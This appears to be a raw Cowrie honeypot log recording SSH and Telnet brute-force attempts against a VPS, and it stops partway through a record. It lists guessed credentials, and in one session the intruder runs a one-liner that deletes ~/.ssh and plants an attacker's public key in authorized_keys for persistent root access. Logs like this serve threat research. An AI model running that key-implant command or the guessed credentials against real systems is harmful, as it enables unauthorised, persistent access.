{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T14:16:47.089805Z","src_ip":"217.72.205.35","session":"d8769202ca1d"}
{"eventid":"cowrie.login.failed","username":"ubuntu","password":"Abc.123456","message":"login attempt [ubuntu/Abc.123456] failed","sensor":"my-vps","timestamp":"2025-08-26T14:16:48.063462Z","src_ip":"212.227.235.229","session":"bfea22fd9f82"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T14:16:49.306568Z","src_ip":"212.227.235.229","session":"bfea22fd9f82"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":36072,"dst_ip":"1.2.3.4","dst_port":22,"session":"6e4a333fb362","protocol":"ssh","message":"New connection: 212.227.125.160:36072 (1.2.3.4:22) [session: 6e4a333fb362]","sensor":"my-vps","timestamp":"2025-08-26T14:17:17.797383Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T14:17:17.798576Z","src_ip":"212.227.125.160","session":"6e4a333fb362"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T14:17:18.050800Z","src_ip":"212.227.125.160","session":"6e4a333fb362"}
{"eventid":"cowrie.login.failed","username":"admin","password":"12345","message":"login attempt [admin/12345] failed","sensor":"my-vps","timestamp":"2025-08-26T14:17:19.891283Z","src_ip":"212.227.125.160","session":"6e4a333fb362"}
{"eventid":"cowrie.session.closed","duration":"3.4","message":"Connection lost after 3.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T14:17:21.149786Z","src_ip":"212.227.125.160","session":"6e4a333fb362"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41362,"dst_ip":"1.2.3.4","dst_port":22,"session":"37ee5eaf6c73","protocol":"ssh","message":"New connection: 212.227.235.229:41362 (1.2.3.4:22) [session: 37ee5eaf6c73]","sensor":"my-vps","timestamp":"2025-08-26T14:18:20.113870Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T14:18:20.115277Z","src_ip":"212.227.235.229","session":"37ee5eaf6c73"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T14:18:20.358363Z","src_ip":"212.227.235.229","session":"37ee5eaf6c73"}
{"eventid":"cowrie.login.failed","username":"mj","password":"mj","message":"login attempt [mj/mj] failed","sensor":"my-vps","timestamp":"2025-08-26T14:18:21.385203Z","src_ip":"212.227.235.229","session":"37ee5eaf6c73"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T14:18:22.674913Z","src_ip":"212.227.235.229","session":"37ee5eaf6c73"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":56114,"dst_ip":"1.2.3.4","dst_port":22,"session":"003ecfbcda91","protocol":"ssh","message":"New connection: 212.227.125.160:56114 (1.2.3.4:22) [session: 003ecfbcda91]","sensor":"my-vps","timestamp":"2025-08-26T14:18:23.789655Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T14:18:23.790559Z","src_ip":"212.227.125.160","session":"003ecfbcda91"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T14:18:24.018825Z","src_ip":"212.227.125.160","session":"003ecfbcda91"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"asteriskftp","message":"login attempt [ftpuser/asteriskftp] failed","sensor":"my-vps","timestamp":"2025-08-26T14:18:25.663849Z","src_ip":"212.227.125.160","session":"003ecfbcda91"}
{"eventid":"cowrie.session.closed","duration":"3.4","message":"Connection lost after 3.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T14:18:27.238592Z","src_ip":"212.227.125.160","session":"003ecfbcda91"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37102,"dst_ip":"1.2.3.4","dst_port":23,"session":"c7ce7681fa7b","protocol":"telnet","message":"New connection: 212.227.235.229:37102 (1.2.3.4:23) [session: c7ce7681fa7b]","sensor":"my-vps","timestamp":"2025-08-26T14:18:28.180396Z"}
{"eventid":"cowrie.session.connect","src_ip":"80.94.95.112","src_port":14865,"dst_ip":"1.2.3.4","dst_port":22,"session":"68d491738673","protocol":"ssh","message":"New connection: 80.94.95.112:14865 (1.2.3.4:22) [session: 68d491738673]","sensor":"my-vps","timestamp":"2025-08-26T14:18:40.397300Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-26T14:18:40.398304Z","src_ip":"80.94.95.112","session":"68d491738673"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-26T14:18:40.428852Z","src_ip":"80.94.95.112","session":"68d491738673"}
{"eventid":"cowrie.login.failed","username":"admin","password":"reviews","message":"login attempt [admin/reviews] failed","sensor":"my-vps","timestamp":"2025-08-26T14:18:40.635301Z","src_ip":"80.94.95.112","session":"68d491738673"}
{"eventid":"cowrie.session.closed","duration":13.020962238311768,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-26T14:18:41.201273Z","src_ip":"212.227.235.229","session":"c7ce7681fa7b"}
{"eventid":"cowrie.login.failed","username":"admin","password":"renee1","message":"login attempt [admin/renee1] failed","sensor":"my-vps","timestamp":"2025-08-26T14:18:41.668045Z","src_ip":"80.94.95.112","session":"68d491738673"}
{"eventid":"cowrie.login.failed","username":"admin","password":"reindeer","message":"login attempt [admin/reindeer] failed","sensor":"my-vps","timestamp":"2025-08-26T14:18:42.700563Z","src_ip":"80.94.95.112","session":"68d491738673"}
{"eventid":"cowrie.login.failed","username":"admin","password":"regional","message":"login attempt [admin/regional] failed","sensor":"my-vps","timestamp":"2025-08-26T14:18:43.733359Z","src_ip":"80.94.95.112","session":"68d491738673"}
{"eventid":"cowrie.login.failed","username":"admin","password":"rebbyt34","message":"login attempt [admin/rebbyt34] failed","sensor":"my-vps","timestamp":"2025-08-26T14:18:44.767263Z","src_ip":"80.94.95.112","session":"68d491738673"}
{"eventid":"cowrie.session.closed","duration":"5.4","message":"Connection lost after 5.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T14:18:45.799615Z","src_ip":"80.94.95.112","session":"68d491738673"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":41178,"dst_ip":"1.2.3.4","dst_port":23,"session":"3d3c8ae45cbb","protocol":"telnet","message":"New connection: 212.227.125.160:41178 (1.2.3.4:23) [session: 3d3c8ae45cbb]","sensor":"my-vps","timestamp":"2025-08-26T14:19:38.873614Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33026,"dst_ip":"1.2.3.4","dst_port":22,"session":"17508199bf59","protocol":"ssh","message":"New connection: 212.227.235.229:33026 (1.2.3.4:22) [session: 17508199bf59]","sensor":"my-vps","timestamp":"2025-08-26T14:19:55.676907Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T14:19:55.677861Z","src_ip":"212.227.235.229","session":"17508199bf59"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T14:19:55.906834Z","src_ip":"212.227.235.229","session":"17508199bf59"}
{"eventid":"cowrie.login.success","username":"root","password":"Aa123456!@#","message":"login attempt [root/Aa123456!@#] succeeded","sensor":"my-vps","timestamp":"2025-08-26T14:19:57.595724Z","src_ip":"212.227.235.229","session":"17508199bf59"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T14:19:58.117418Z","src_ip":"212.227.235.229","session":"17508199bf59"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T14:19:58.118108Z","src_ip":"212.227.235.229","session":"17508199bf59"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T14:19:58.119365Z","src_ip":"212.227.235.229","session":"17508199bf59"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T14:19:58.350892Z","src_ip":"212.227.235.229","session":"17508199bf59"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T14:19:58.913114Z","src_ip":"212.227.235.229","session":"17508199bf59"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T14:19:58.913807Z","src_ip":"212.227.235.229","session":"17508199bf59"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T14:19:59.146232Z","src_ip":"212.227.235.229","session":"17508199bf59"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T14:19:59.147264Z","src_ip":"212.227.235.229","session":"17508199bf59"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33038,"dst_ip":"1.2.3.4","dst_port":22,"session":"8bb54173884b","protocol":"ssh","message":"New connection: 212.227.235.229:33038 (1.2.3.4:22) [session: 8bb54173884b]","sensor":"my-vps","timestamp":"2025-08-26T14:19:59.387436Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T14:19:59.388355Z","src_ip":"212.227.235.229","session":"8bb54173884b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T14:19:59.628960Z","src_ip":"212.227.235.229","session":"8bb54173884b"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T14:20:00.632280Z","src_ip":"212.227.235.229","session":"8bb54173884b"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T14:20:01.876005Z","src_ip":"212.227.235.229","session":"8bb54173884b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49758,"dst_ip":"1.2.3.4","dst_port":22,"session":"97f88ad54b58","protocol":"ssh","message":"New connection: 212.227.235.229:49758 (1.2.3.4:22) [session: 97f88ad54b58]","sensor":"my-vps","timestamp":"2025-08-26T14:20:02.136909Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T14:20:02.137899Z","src_ip":"212.227.235.229","session":"97f88ad54b58"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 